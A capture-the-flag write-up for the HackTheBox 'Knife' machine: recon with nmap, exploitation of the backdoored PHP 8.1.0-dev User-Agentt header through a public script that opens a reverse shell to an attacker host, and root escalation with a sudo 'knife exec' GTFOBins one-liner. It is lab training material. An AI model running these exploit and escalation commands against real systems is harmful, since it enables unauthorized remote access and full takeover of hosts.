HackTheBox: Knife
burp-suite gtfo knife linux nmap php sudoKnife is a Linux-based machine authored by MrKN16H7, with an average rating of 3.5 stars.
// Recon
nmap -A -p- 10.10.10.242
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-28 15:04 AEST
Nmap scan report for 10.10.10.242
Host is up (0.017s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.11 seconds
Nmap confirms the machine is Linux-based (running Ubuntu) and reveals two open services:
- ssh on port 22
- http on port 80
The site running on port 80 references a medical care company, with very little content. Fuzzing the site didn’t reveal anything worth investigating either.
// Initial Foothold
With not much to go on at this stage, we can load the site into Burp Suite to see what’s happening behind the scenes. Here we discover two headers in the HTTP server response that give us more to go on:
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
As always, any specific version of software identified on a target should be looked into for known vulnerabilities. It’s slightly unusual to see a -dev version of something like PHP in use on a production system, so this seems like a good place to start.
Sure enough, a search on Google reveals that a malicious backdoor was added to PHP 8.1.0-dev, whereby an attacker could perform remote code execution via the "User-Agentt" header:
“An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.”
There are numerous exploits available online such as this one from GitHub, which establishes a reverse shell to the host with a single command:
python3 backdoor_php_8.1.0-dev.py http://10.10.10.242 attacker.ip port
Interactive shell is opened on http://10.10.10.242
Can't acces tty; job crontol turned off.
$
With access to the machine achieved, we find the User-Own key in the usual location:
$ whoami
james
$ ls -la ~
total 40
drwxr-xr-x 5 james james 4096 May 18 13:20 .
drwxr-xr-x 3 root root 4096 May 6 14:44 ..
lrwxrwxrwx 1 james james 9 May 10 16:23 .bash_history -> /dev/null
-rw-r--r-- 1 james james 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 james james 3771 Feb 25 2020 .bashrc
drwx------ 2 james james 4096 May 6 14:45 .cache
drwxrwxr-x 3 james james 4096 May 6 16:32 .local
-rw-r--r-- 1 james james 807 Feb 25 2020 .profile
-rw-rw-r-- 1 james james 66 May 7 14:16 .selected_editor
drwx------ 2 james james 4096 Jun 2 08:47 .ssh
-r-------- 1 james james 33 Jun 2 07:12 user.txt
$ cat ~/user.txt
a*******************************
// Privilege Escalation
A good first step after gaining access to a new machine is to enumerate that user’s capabilities, to understand what options exist for lateral movement & privilege escalation. The common sudo -l check, to list commands this user can run with higher privileges, gives us something interesting:
$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
Knife is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server. Chef is a ruby-based DevOps automation platform, designed to simplify management of multiple hosts across a network from a single point of control. This kind of software by definition requires elevated privileges, making it a possible path to privilege escalation. We can read the knife documentation about how this might be achieved, but gtfobins provides a much faster answer:
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo knife exec -E 'exec "/bin/sh"'
Running the above command is all we need to do to elevate our user access to root, and from there the System-Own key is easily obtained:
$ sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
# whoami
root
# ls /root
delete.sh root.txt snap
# cat /root/root.txt
b*******************************